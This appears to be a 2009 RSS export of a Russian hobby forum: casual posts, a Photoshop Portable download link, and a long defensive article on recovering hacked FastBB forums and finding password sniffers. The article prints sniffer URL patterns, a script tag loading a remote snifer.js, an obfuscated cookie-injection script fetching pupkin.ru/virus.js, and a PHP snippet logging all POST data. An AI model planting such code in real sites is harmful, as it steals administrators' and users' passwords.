<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://fun.rusff.me/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>XDforum</title>
		<link>http://fun.rusff.me/</link>
		<description>XDforum</description>
		<language>ru-ru</language>
		<lastBuildDate>Sun, 11 Oct 2009 16:55:55 +0400</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Раздача №1 (7ми знаки)</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6625#p6625</link>
			<description>&lt;p&gt;Спасибо огромное и на этом! &lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://www.kolobok.us/smiles/standart/dance4.gif&quot; alt=&quot;http://www.kolobok.us/smiles/standart/dance4.gif&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 16:55:55 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6625#p6625</guid>
		</item>
		<item>
			<title>Правила создания хорошего сайта</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6623#p6623</link>
			<description>&lt;p&gt;хорошая инфа&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 14:51:40 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6623#p6623</guid>
		</item>
		<item>
			<title>Тыква на Helloween</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6622#p6622</link>
			<description>&lt;p&gt;а че нормально! только бы скринов!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:56:38 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6622#p6622</guid>
		</item>
		<item>
			<title>Слова</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6621#p6621</link>
			<description>&lt;p&gt;ЛисА&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:55:32 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6621#p6621</guid>
		</item>
		<item>
			<title>Анегдоты</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6620#p6620</link>
			<description>&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;FL@$H написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;На Валуева в лесу напал медведь. Как объяснили ученые, косолапый переелмухоморов и потерял инстинкт самосохранения.&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;ухахах прикольно)))&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:54:37 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6620#p6620</guid>
		</item>
		<item>
			<title>Photoshop Portable CS 4</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6618#p6618</link>
			<description>&lt;p&gt;И так решил выложить 4-ую версию фотошопа &lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://www.kolobok.us/smiles/standart/clapping.gif&quot; alt=&quot;http://www.kolobok.us/smiles/standart/clapping.gif&quot; /&gt; &lt;br /&gt;&lt;a href=&quot;http://depositfiles.com/files/unmld2170&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;СКАЧАТЬ&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:51:07 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6618#p6618</guid>
		</item>
		<item>
			<title>Jerry Studio</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6617#p6617</link>
			<description>&lt;p&gt;отличные картинки!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:50:48 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6617#p6617</guid>
		</item>
		<item>
			<title>Пункт Назначения 4</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6616#p6616</link>
			<description>&lt;p&gt;Пишем все о фильме!&lt;/p&gt;
						&lt;p&gt;Я ходил а 3D aфильм нормальный советую всем смотреть! Особенно в 3D&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:48:46 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6616#p6616</guid>
		</item>
		<item>
			<title>Counter Strike 1.6</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6615#p6615</link>
			<description>&lt;p&gt;Великая ОНЛАЙН игра! Пишите все о ней в эту тему!&lt;/p&gt;
						&lt;p&gt;Делимся песнями о CS&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:46:59 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6615#p6615</guid>
		</item>
		<item>
			<title>Кто есть Вконтакте?</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6614#p6614</link>
			<description>&lt;p&gt;вот он мой Контакт &lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://www.kolobok.us/smiles/standart/dance4.gif&quot; alt=&quot;http://www.kolobok.us/smiles/standart/dance4.gif&quot; /&gt; &lt;br /&gt;&lt;a href=&quot;http://vkontakte.ru/id43169778&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://vkontakte.ru/id43169778&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (PeacH)</author>
			<pubDate>Sun, 11 Oct 2009 12:40:33 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6614#p6614</guid>
		</item>
		<item>
			<title>Выпадающее меню</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6605#p6605</link>
			<description>&lt;p&gt;&lt;strong&gt;Никита&lt;/strong&gt;, это подходит для форумов mybb и партнерских. На основе css и java сделано.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Akahoshi)</author>
			<pubDate>Mon, 05 Oct 2009 21:13:14 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6605#p6605</guid>
		</item>
		<item>
			<title>Обмен баннерами</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6596#p6596</link>
			<description>&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;&amp;lt;a href=&amp;quot;http://lifez.rolka.su/&amp;quot; target=_blank&amp;gt;&amp;lt;img src=&amp;quot;http://i077.radikal.ru/0908/ff/d527e192da1c.jpg&amp;quot; border=&amp;quot;0&amp;quot;alt=&amp;quot;Война кошек и собак&amp;quot; width=88height=31&amp;gt;&amp;lt;/a&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;</description>
			<author>mybb@mybb.ru (Лика)</author>
			<pubDate>Mon, 05 Oct 2009 14:44:36 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6596#p6596</guid>
		</item>
		<item>
			<title>Обмен регистрациями</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6595#p6595</link>
			<description>&lt;p&gt;значит просто для того что бы был участник&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Лика)</author>
			<pubDate>Mon, 05 Oct 2009 14:42:59 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6595#p6595</guid>
		</item>
		<item>
			<title>Ваша реклама&gt;&gt;Кидайте здесь свою рекламу</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6593#p6593</link>
			<description>&lt;p&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;span style=&quot;font-family: Comic Sans Ms&quot;&gt;&lt;a href=&quot;http://lifez.rolka.su/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;~*~Война кошек и собак~*~&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt; &lt;a href=&quot;http://www.radikal.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://s61.radikal.ru/i174/0908/13/f7dfae2de401.jpg&quot; alt=&quot;http://s61.radikal.ru/i174/0908/13/f7dfae2de401.jpg&quot; /&gt;&lt;/a&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;span style=&quot;color: red&quot;&gt;На форуме &lt;a href=&quot;http://lifez.rolka.su/viewtopic.php?id=8#p9&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;заказаны&lt;/a&gt; персонажи!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;Давным-давно, в далёком лесу, было две стаи. Стая Восходящего Солнца и Стая Лунного Света. Они враждовали между собой. А всё из-за того что они были разные... Стая Восходящего Солнца была благородна и честна. А Стая Лунного Света была жестока и своенравна. Не подумайте что Стая Восходящего Солнца выходила только днём, а Стая Лунного Света только вечером. Нет, это правда только отчасти. Стая Восходящего Солнца получила своё название в честь своего первого вожака, Луча. А Стая Лунного Света в честь их первого вожака, Луны. Вот так бы они жили если бы однажды один воин не забрёл в чащу леса и не нашёл бы там Своры котов. Почему Своры? Да потому что. Оказывается на другой половине леса живут две Своры, Свора Стальных Клыков и Свора Тёплого Сердца. И здесь разразилась настоящая война. Собаки забыли на время свою вражду стали против кошек. Кошки зделали тоже самое и стали воевать с собаками. Так прошло много лет и до сих пор эта война незакончена...&lt;/span&gt;&lt;br /&gt;Ваша реклама - &lt;a href=&quot;http://lifez.rolka.su/viewtopic.php?id=25&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://lifez.rolka.su/viewtopic.php?id=25&lt;/a&gt; &lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://www.kolobok.us/smiles/standart/dance2.gif&quot; alt=&quot;http://www.kolobok.us/smiles/standart/dance2.gif&quot; /&gt;&lt;br /&gt;&lt;span style=&quot;display: block; text-align: right&quot;&gt;&lt;span style=&quot;color: red&quot;&gt;//одобренно. &lt;strong&gt;Администратор&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Лика)</author>
			<pubDate>Mon, 05 Oct 2009 13:02:24 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6593#p6593</guid>
		</item>
		<item>
			<title>Общение на любые темы</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6591#p6591</link>
			<description>&lt;p&gt;Приветик вам &lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://mybb.ru/f/collection/0208.gif&quot; alt=&quot;http://mybb.ru/f/collection/0208.gif&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (.Kiki_blood)</author>
			<pubDate>Sat, 03 Oct 2009 16:02:03 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6591#p6591</guid>
		</item>
		<item>
			<title>Календарные события</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6581#p6581</link>
			<description>&lt;p&gt;4 октября 2009&lt;br /&gt;Стрекоза идёт на Петровский! &lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://www.kolobok.us/smiles/standart/censored.gif&quot; alt=&quot;http://www.kolobok.us/smiles/standart/censored.gif&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Стрекоза)</author>
			<pubDate>Fri, 02 Oct 2009 15:36:05 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6581#p6581</guid>
		</item>
		<item>
			<title>Скачать профессиональный браузер Opera AC 3.7a (Рекомендую)</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6574#p6574</link>
			<description>&lt;p&gt;Ссылка битая.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Akahoshi)</author>
			<pubDate>Fri, 25 Sep 2009 17:31:34 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6574#p6574</guid>
		</item>
		<item>
			<title>Наши фотографии</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6573#p6573</link>
			<description>&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;Андрюха написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;если на форуме останешься, то покажусь)&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;Да что уж там, может быть и я тогда покажусь, тольуо уогда это будет.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Akahoshi)</author>
			<pubDate>Fri, 25 Sep 2009 17:27:38 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6573#p6573</guid>
		</item>
		<item>
			<title>Набор модераторов, редакторов, мастеров, дизайнеров</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6572#p6572</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-family: Comic Sans Ms&quot;&gt;Понятно)&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Андрюха)</author>
			<pubDate>Fri, 25 Sep 2009 17:03:03 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6572#p6572</guid>
		</item>
		<item>
			<title>Windows на смарт</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6559#p6559</link>
			<description>&lt;p&gt;&lt;strong&gt;RePlay&lt;/strong&gt;, это издевательство, товарищ? Никакую операционную систему на смартфон, равно как и на КПК, установить невозможно, кроме той, что была вшита в аппарат при изготовлении. Для смартфонов Нокиа эта система - Symbian, так что не страдайте чепухой.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Akahoshi)</author>
			<pubDate>Fri, 25 Sep 2009 09:50:39 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6559#p6559</guid>
		</item>
		<item>
			<title>Города</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6557#p6557</link>
			<description>&lt;p&gt;Антверпен&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Akahoshi)</author>
			<pubDate>Fri, 25 Sep 2009 00:43:44 +0400</pubDate>
			<guid>http://fun.rusff.me/viewtopic.php?pid=6557#p6557</guid>
		</item>
		<item>
			<title>Что делать, если ваш форум взломали</title>
			<link>http://fun.rusff.me/viewtopic.php?pid=6553#p6553</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 18px&quot;&gt;&lt;strong&gt;Общие замечания&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Думаю, небольшая заметка будет уместна.&lt;/p&gt;
						&lt;p&gt;Что делать, если на форуме появился еще один нежданный админ?&lt;/p&gt;
						&lt;p&gt;/Способы того, как он появился, мы рассматривать по возможности не будем... Но это поверьте - это действительно возможно... /&lt;/p&gt;
						&lt;p&gt;Говорить -&amp;quot;ба, какие люди&amp;quot; - не нужно. Идти к Кейсу и говорить там дядя у меня какой-то, тоже не надо, точнее не вовремя. Время на счету. Дороги секунды. Как ни странно, можно отстоять форум и обломать хакера.&lt;/p&gt;
						&lt;p&gt;Рекомендую сразу сменить гпф. Без выяснения подробностей. Далее используя свой профиль, понизить в статусе админа и забанить его.&lt;br /&gt;Если ваш профиль удален, создать новый с паролем гпф и сменить гпф на новый еще раз. Объясню зачем следует так делать. Вы регистрируете профиль, а на форуме может стоять снифер и, вуаля, хакер узнает ваш гпф. Получается, что мне даже не надо знать ваш гпф, чтобы взломать форум, мне и админского пароля достаточно, а потом, когда вы начнете дергаться, выудить и гпф. И тогда только Кейс, ваш спаситель и надежда.&lt;/p&gt;
						&lt;p&gt;Но вернемся к нашей сцене взлома. Как мы разобрались - смена пароля также опасна и на взломанном сайте.&lt;br /&gt;И даже забаненный хакер может вернуться. Поэтому мы не только меняем гпф, но и восстанавливаем хтмл-низ и верх, что бы избавиться от снифера. Естественно, старый код дублируется и сохраняется для восстановления дизайна и анализа специалистом его начинки, для проверки на наличие снифера.&lt;/p&gt;
						&lt;p&gt;Игры с забаниванием могут быть продолжительными, особенно если вы потеряли гпф И тут вам без дубликата админского профиля никуда... Да и еще, некоторые делают хорошую вещь - они регят себе еще один профиль с админским статусом и &amp;quot;забывают&amp;quot; про него до поры до времени... профиль тот уходит в глубину списка пользователей и может быть не замечен хакером))) А потом уже вы ставите тихой ночью сниф и удаляете хакера, который утром дергается и теряет уже свой гпф.&lt;/p&gt;
						&lt;p&gt;Таким образом вы обратили наверное внимание на то, что любой предложенный кем то добрым код для вставки на форум потенциально опасен. Особенно если вы в нем не разбираетесь. И то, что чем больше админов тем лучше для хакеров. У них есть большие шансы взломать хотя бы одного...&lt;/p&gt;
						&lt;p&gt;Его /код снифера/ можно вставить даже в скрипт летающих бабочек :flag: вполне работающих, но и от кражи пароля не отказывающихся бабочек.&lt;/p&gt;
						&lt;p&gt;Теперь вы скажите: я до тогой тупости не опущусь. Хорошо. Значит тогда я узнаю ваш почтовый ящик, а это поверьте мне не сложно сделать и взломав его запрошу восстановление пароля. И на уже мою почту придет пароль.&lt;/p&gt;
						&lt;p&gt;А дальше я подсуну код снифера. И опять ГПФ мой))&lt;/p&gt;
						&lt;p&gt;И как же так? Вы скрывали свою почту. Ее не отображал ваш профиль? А дело в том что ящик у вас один на все случаи жизни. Вывод: нужен еще один ящик под эти цели. Адрес которого вы ни кому и не когда не скажите.&lt;/p&gt;
						&lt;p&gt;С таким ящиком не жалко и все фишки защиты форума запустить.&lt;/p&gt;
						&lt;p&gt;Пропишите его в профиле и активируйте. Тогда вы сможете восстановить забытый пароль.&lt;/p&gt;
						&lt;p&gt;Но ни когда не прописывайте вашу общественную почту. Лучше воздержаться от этого. И не прописывать почту в профиле вообще.&lt;/p&gt;
						&lt;p&gt;Рекомендую заводить почту исключительно на &lt;a href=&quot;http://gmail.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://gmail.com&lt;/a&gt; (не путать с &lt;a href=&quot;http://gmail.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://gmail.ru&lt;/a&gt;!). Если почта на нем, я как правило не берусь ее ломать А вот мэил.ру!!! Другое дело! И еще НМ и почты.нет И еще много других почтовых серверов лохоимцев)) Этих да в первую очередь&lt;/p&gt;
						&lt;p&gt;Теперь о паролях. Как не странно у многих он один на все форумы и сайты и почту и гпф...&lt;/p&gt;
						&lt;p&gt;В общем каждому форуму и сайту свой пароль... Ну можно расслабится и сделать а ля гостевой пароль и несколько секретных. )))&lt;/p&gt;
						&lt;p&gt;Еще можно украсть ваш пароль (а точнее кукисы, они же куки) через браузер Internet Explorer (ИЕ, ишак, ослик, ишачок...) и если он совпадет с паролем форума быть беде. С самого форума украсть через браузер пароль сейчас не возможно. Кейс защитил форум от этого. А вот с другого ресурса вполне возможно и реально. Помните об этом и не ходите на малознакомые сайты и тем более по ссылкам от неизвестных вам личностей. А еще смените его (браузер) на Оперу или ФайрФокс (Огнелис) в которых пресловутая уязвимость отсутствует, а значит вас ни кто не обманет&lt;/p&gt;
						&lt;p&gt;В любом случае если что не расстраивайтесь и идите к Кейсу на форум техподдержки и просите помощи ( Заявки на восстановление «взломанных» форумов ). Спокойно расскажите как и когда (а может даже и как) вас взломали. Укажите ссылку на форум (!). Не кричите. Поменьше истерики. Вас не захотят слушать если вы будете предъявлять претензии. И правильно сделают - вы сами виноваты, что вас обманули! Покажите как можно больше доказательств взлома. Вплоть до скриншотов переписки и главной страницы форума.&lt;/p&gt;
						&lt;p&gt;Поверьте часто хакер (если он человек умный) не станет афишировать взлом. Он аккуратно прикроет форум, чтобы и в мыслях не было подозрений на взлом))) И не станет разводить дискуссий. Проставит черный режим, всех понизит. Вроде форум есть, а взлома нет)&lt;/p&gt;
						&lt;p&gt;Модераторский состав должен быть хорошо подобран. Поскольку диверсии со стороны &amp;quot;модераторов&amp;quot;-хакеров не так страшны, но все же встречаются, не ленитесь копировать информацию, хотя бы сообщения первых топиков. Сами модераторы должны уметь предупредить вас о случившемся. Соответственно они должны знать, куда писать, а что еще лучше звонить!&lt;/p&gt;
						&lt;p&gt;Модераторы должны быть распределены по разделам, а не быть по принципу все на все разделы. Иначе вы никогда не узнаете кто же совершил диверсию в разделе.&lt;/p&gt;
						&lt;p&gt;Вы не поверите, но испугав подобной шалостью админы меняют себе пароль))) А это так хорошо для снифа... &lt;/p&gt;
						&lt;p&gt;Закончу статью тем, что хорошо бы поставить себе на форум логер. И знать кто и когда приходил, с каким статусом, и в каком разделе он был. Код логера не предлагаю... как думаете почему?&lt;/p&gt;
						&lt;p&gt;Желаю вам удачи. И счастья не знать что такое горе обездоленного админа. С уважением ваш Мефи.&lt;br /&gt;______________________________________________&lt;br /&gt;Справочный материал:&lt;br /&gt;ГПФ - главный пароль форума задается при регистрации форума и может быть изменен здесь - &lt;a href=&quot;http://catalogue.forum24.ru/?40&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://catalogue.forum24.ru/?40&lt;/a&gt; соответственно у вас свое имя форума и домена: имя.домен.ru/?40, где домен forum24 или borda.&lt;/p&gt;
						&lt;p&gt;СИ - социальный инженеринг - совокупность методов обмана юзера для конечной цели - выуживание полезной информации или пароля/доступа.&lt;/p&gt;
						&lt;p&gt;Куки, кука - грубо говоря файл в котором лежит ваш пароль дабы не вводить пароль на каждой странице сайта и форума. Вас как бы &amp;quot;запомнили&amp;quot; на время существования кука (пока вы не вышли с сайта по ссылке выйти) или сессии (по времени, например на час помнить вас).&lt;/p&gt;
						&lt;p&gt;Вы много слышали об этом страшном звере... снифер! Вор паролей!&lt;br /&gt;Надеюсь я вас хорошо запугал и вы дрожите Но я вас не просто так пугал Я хочу что бы вы знали в лицо врага и умели с ним бороться. Итак рассмотрим его поближе...&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 18px&quot;&gt;&lt;strong&gt;Методы обнаружения снифера и его удаление&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Снифер хороший зверек, живет и не кого не трогает пока вы не вошли на форум или не сменили пароль в профиле))) В общем ввод пароля опасен если вы не просмотрели исходный код страницы форума&lt;/p&gt;
						&lt;p&gt;Как посмотреть если у вас снифер? Элементарно: вид - исходный текст или Ctrl+F3 (в Опере) и вид - просмотр HTML-кода (в Internet Explorer’e - который как мы выяснили в предыдущей статье приносит вред безопасности пользователя).&lt;/p&gt;
						&lt;p&gt;Перед нами код странички. Наша задача осмотреться и принять решение входить на форум или не стоит Особенно если форум чужой и вы были туда в спешке приглашены, а возможно вас там обсуждают активно и критикуют И там нашли ваши порно фотки Вы теряете голову пишите тот же пароль что и всегда))) И, вуаля, вернувшись на свой родной форум вы видите пепелище и горькую свою участь&lt;/p&gt;
						&lt;p&gt;Текстовом редакторе нас интересует знак вопроса. И не случайно! Ведь большинство сниферов имеют пхп запросы. Которые описываются как раз этим коварным знаком))) Значит ищем его правка - поиск) Если есть и не вы его писали значит дело дрянь))) Точнее дело дрянь у хакера&lt;/p&gt;
						&lt;p&gt;Вот возможный вид этой строчки http://sniffer/picture.gif?password=&amp;quot;...&lt;br /&gt;и многие другие&lt;br /&gt;В общем вот это должно вас напугать &amp;quot;....что то тут.....?.....и что то тут.......&amp;quot;&lt;/p&gt;
						&lt;p&gt;А так же слова Password, user и самое страшное слово - Кейс Шутка конечно на счет последнего... Хотя и тоже правда от части))&lt;/p&gt;
						&lt;p&gt;Вот теперь ваши шаги для избавления от снифера:&lt;br /&gt;- восстановите дизайн в первоначальное состояние,&lt;br /&gt;- зайдите на форум и восстановите дизайн из вашей копии форума (которую вы я надеюсь всегда держите под рукой),&lt;br /&gt;- установить кто же это сделал...&lt;/p&gt;
						&lt;p&gt;Если нет копии дизайна попробуйте удалить следующий кусок кода вручную&lt;/p&gt;
						&lt;p&gt;&amp;lt;script ..........&amp;gt;&lt;br /&gt;....................&lt;br /&gt;................?................&lt;br /&gt;................................&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;если боитесь испортить код форума, просто удалите знак вопроса. Этого вполне достаточно для нарушения работы вора паролей. Не забудьте после удаления снифера сменить пароль(!)&lt;/p&gt;
						&lt;p&gt;Насчет обнаружения виновника, вам поможет первая статья. Но часто это видно по последнему списку посетителей. У которых есть права админа.&lt;/p&gt;
						&lt;p&gt;Надеюсь был вам полезен. И вы будете осторожны в мире инета))) Надеюсь вы не станете параноиком после моих статей...))&lt;/p&gt;
						&lt;p&gt;ЗЫ. О методах сокрытия снифера я вам так и не рассказал... оставлю для себя пожалуй А то вдруг захочу вспомнить старое&lt;/p&gt;
						&lt;p&gt;Ладно открою последний козырь...&lt;br /&gt;&amp;lt;SCRIPT language=&#039;JavaScript1.1&#039; src=&#039;http://site.domen.ru/snifer.js&#039;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;Вот такие строки должны наводить вас на мысль что весь код снифера был закинут в отдельный файл и этот файл линкуется в страничке. Таким образом весь довольно большой кусок снифера прячется туда.&lt;/p&gt;
						&lt;p&gt;Зайдите по ссылке &lt;a href=&quot;http://site.domen.ru/snifer.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://site.domen.ru/snifer.js&lt;/a&gt; и просмотрите есть ли там запросы со знаком вопроса...&lt;/p&gt;
						&lt;p&gt;ЗЫЫ. И последнее если там абракадабра и мешанина значит весь сниф предварительно зашифровали от глаз юзера. Он тоже рабочий))) Только без знака вопроса будет))) Просто удалите&lt;/p&gt;
						&lt;p&gt;&amp;lt;SCRIPT language=&#039;JavaScript1.1&#039; src=&#039;http://site.domen.ru/snifer.js&#039;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;/p&gt;
						&lt;p&gt;с вашего форума и спите спокойно. Enjoy! Это все текущие современные методы взлома фастбб. Других нет. Да и эти тяжело протащить и осуществить. Фаста не ломается (с) Кейс.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 18px&quot;&gt;&lt;strong&gt;Кое-что еще...&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Еще была уязвимость такого рода:&lt;br /&gt;хакер-модератор при бане любого участника вписывал не только айпи, но с помощью проги и вор паролей! Зайдя в список забаненых вас могли или могут /мне не известно сумел ли Кейс это исправить/ обокрасть и лишить пароля.&lt;/p&gt;
						&lt;p&gt;Как избавиться?&lt;br /&gt;Простым просмотром исходного кода определите наличие снифера. И удалите этого забаненного из списка бан-листа. После чего смените пароль себе и всем кто лазил в бан-лист. Можно сменить и гпф.&lt;/p&gt;
						&lt;p&gt;После чего узнайте кто из модераторов мог это сделать. Возможно нужно спросить так называемый &amp;quot;секретный вопрос&amp;quot;. Ответ на который знают лишь истинные модераторы. А хакер который угнал профиль не знает.&lt;br /&gt;Печальней всего будет если вы сами его назначили. =)&lt;/p&gt;
						&lt;p&gt;Теперь о ЛЗ. Не секрет что на некоторых ролевых форумах можно заказать себе личное звание указав свой код. Я был буквально на днях на одном форуме и прикола ради указал код чатика. И его мне поставили. А так как в коде забыл закрыть один тег... Все страницы с моим участием разворотило до неузнаваемости)))&lt;br /&gt;Но это не важно, я мог пихнуть им снифера! И написав во всех темах форума по сообщению, ждать богатого улова. ]:-&amp;gt;&lt;/p&gt;
						&lt;p&gt;Так что незнание чего то кем то большая возможность для хакинга!&lt;/p&gt;
						&lt;p&gt;Что делать с лз? Ну заведите стандартную форму заполнения и СТРОГО придерживаетесь ее. А незнакомый код сразу отбрасывать и запрещать ставить своим со-админам.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 18px&quot;&gt;&lt;strong&gt;Письмо к Кейсу&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;Привет. Это Норм Иридиум.&lt;br /&gt;Я был забанен предположительно год назад на форуме техподдержки. С тех пор я многое передумал. И завязал с хакерской деятельностью окончательно. Обещаю не флудить на форуме. Тем более теперь у меня есть чем заниматься, а не страдать всякой фигней типа взлома малолеток и их ролевых форумов. Я стал помогать пользователям Фастбб в решении их проблем и способствовать укреплению безопасности их форумов. Целиком и полностью за счет разъяснительной работы.&lt;br /&gt;Прошу простить меня, а я думаю меня есть за что не любить...&lt;/p&gt;
						&lt;p&gt;В заключении передаю Вам информацию (правда не проверенную мной лично) о новом методе взлома форумов:&lt;/p&gt;
						&lt;p&gt;&amp;lt;script&amp;gt;&lt;br /&gt;document.cookie=&amp;quot;t=&#039;+eval(unescape(&#039;document.write%28%27%3Csc%27+&lt;br /&gt;%27ript%20 src%3D%22http%3A%2F%2 Fpupkin.ru%2Fvirus.js %22%3E%3C%2Fsc%27+&lt;br /&gt;%27ript%3E%27%29%3B&#039;))+&#039;;domain=.forum24.ru&amp;quot;;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;if (!isset($_COOKIE[&#039;block_the_fuck&#039;])){&lt;br /&gt;$ThePost = serialize($_POST);&lt;br /&gt;$fp = fopen(&#039;.the_post&#039;, &#039;a&#039;);&lt;br /&gt;fwrite($fp, $ThePost.&amp;quot;\n&amp;quot;);&lt;br /&gt;fclose($fp);&lt;br /&gt;}&lt;/p&gt;
